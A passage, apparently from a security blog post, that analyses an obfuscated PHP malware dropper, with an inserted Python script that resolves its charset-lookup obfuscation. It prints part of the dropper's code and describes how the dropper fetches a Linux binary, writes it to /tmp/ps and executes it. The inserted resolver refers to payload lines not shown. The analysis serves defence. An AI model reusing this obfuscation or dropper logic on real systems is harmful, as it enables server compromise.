if ($jznmi77 == FALSE || $jznmi77 != $GLOBALS['aojaf86']($ppoqb47))
return FALSE;
}
return TRUE;
}

function gbzrm90($s38, $htxbt38, $nqwrs0)
{
$ppoqb47 = $GLOBALS['adwwg63']($s38, $htxbt38);
if ($ppoqb47 == FALSE)
return FALSE;
if ($GLOBALS['jwlcr58']($s38, $s38[46].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
if ($GLOBALS['jwlcr58']($s38, $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
return FALSE;
}
else
{
return $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0;
}
}
else
{
return $s38[46].$s38[24].$nqwrs0;
}
return FALSE;
}

A short look shows that the code checks the system with php_uname and downloads an xxxx64/xxxx32 file, which was analysed by our friends at MalwareMustDie at:
http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
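Reading the payload above by hand means looking up every $s38[N] in the charset. The following Python resolver is an added example, not part of the original post or of the blocklist.de code: it applies PHP's double-quote escapes to the $s38 literal and replaces each lookup with its character. The charset is copied from the page with one correction: the base64 of the POST body shown above decodes to `0G<)V`, so the space the blog rendering shows between `<` and `)` is residue and is left out; with it in place every index from 77 upwards would be off by one and none of the names would resolve. The assignment lines and argument expressions are copied from the decoded payload above.

```python
import re

# The $s38 charset as it appears in the decoded payload on this page, still as a PHP
# double-quoted literal (so \\, \t, \n, \r, \$ and \" are PHP escapes). The base64 of
# the original POST body reads "G<)V" here; the space the blog shows is left out.
S38_LITERAL = r'''Wn\\ia*om=}YU BjwQ&g-SLMq^/t:P~\tdTZ]'8(xk@D\$3#1\n.6_NhR+[9ys;C|l!b%5If42HOpJu0G<)V`F\r{X,E>K\"eczr 7Av?'''.replace('YU B', 'YUB')

# Simple PHP double-quote escapes (the sample uses no \x.., octal or \u{..} escapes).
PHP_ESCAPES = {'n': '\n', 't': '\t', 'r': '\r', 'v': '\v', 'f': '\f',
               'e': '\x1b', '\\': '\\', '$': '$', '"': '"'}

def php_unescape(literal):
    """Turn the body of a PHP double-quoted string into its runtime value."""
    out, i = [], 0
    while i < len(literal):
        if literal[i] == '\\' and i + 1 < len(literal) and literal[i + 1] in PHP_ESCAPES:
            out.append(PHP_ESCAPES[literal[i + 1]])
            i += 2
        else:
            out.append(literal[i])
            i += 1
    return ''.join(out)

INDEX_RE = re.compile(r'^\$(\w+)\[(\d+)\]$')
ASSIGN_RE = re.compile(r"""^\s*(?:\$GLOBALS\[['"](\w+)['"]\]|\$(\w+))\s*=\s*(.+?);\s*$""")

def resolve(expr, charset, name='s38'):
    """Resolve a PHP concatenation of $s38[N] lookups into the string it builds.
    Tokens that are not charset lookups (other variables, literals) are kept in
    braces so the reader can see where dynamic data is spliced in."""
    parts = []
    for tok in expr.strip().rstrip(';').split('.'):
        tok = tok.strip()
        m = INDEX_RE.match(tok)
        if m and m.group(1) == name:
            parts.append(charset[int(m.group(2))])
        else:
            parts.append('{' + tok + '}')
    return ''.join(parts)

def deobfuscate(lines, charset):
    """Map every `$GLOBALS['x'] = ...` / `$x = ...` line to the string it resolves to."""
    names = {}
    for line in lines:
        m = ASSIGN_RE.match(line)
        if m:
            names[m.group(1) or m.group(2)] = resolve(m.group(3), charset)
    return names

# Assignment lines copied from the decoded payload on this page.
SAMPLE_LINES = [
    "$GLOBALS['xtkzp94'] = $s38[71].$s38[50].$s38[71].$s38[48].$s38[73].$s38[1].$s38[4].$s38[7].$s38[89];",
    "$GLOBALS['fjiib51'] = $s38[66].$s38[73].$s38[1].$s38[90].$s38[25].$s38[3].$s38[6].$s38[1].$s38[48].$s38[89].$s38[37].$s38[3].$s38[56].$s38[25].$s38[56];",
    "$GLOBALS['aojaf86'] = $s38[56].$s38[25].$s38[92].$s38[60].$s38[89].$s38[1];",
    "$nneyn30 = $s38[71].$s38[56];",
]

S38 = php_unescape(S38_LITERAL)

if __name__ == '__main__':
    for name, value in deobfuscate(SAMPLE_LINES, S38).items():
        print(f"{name:10s} -> {value!r}")
    # arguments the payload builds inline at its call sites
    for expr in ("$s38[56].$s38[50].$s38[89].$s38[60].$s38[60].$s38[48].$s38[89].$s38[37].$s38[89].$s38[90]",
                 "$s38[20].$s38[3].$s38[1].$s38[73].$s38[37]",
                 "$s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0"):
        print(repr(resolve(expr, S38)))
```

Resolving the lines on this page gives php_uname, function_exists, strlen, shell_exec (probed with function_exists, hence the noshex error marker), curl_init, file_put_contents, the literal "Linux", the fopen modes "rb" and "wb+", and "./" or "/tmp/" prefixed to the file name "ps": the script bails out unless php_uname reports Linux, fetches the 64- or 32-bit binary via curl or fopen, writes it to ./ps or /tmp/ps, and hands the path to a function whose name is assigned in the truncated part (presumably shell_exec). The remaining $GLOBALS names (gwigy41, dfyoo42, jtjiv94 and the others) cannot be resolved from what the page shows.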

For more information and updates you can follow MalwareMustDie on Twitter:
https://twitter.com/MalwareMustDie


So please update and secure all your sites and scripts!

If you have questions, please contact us :)
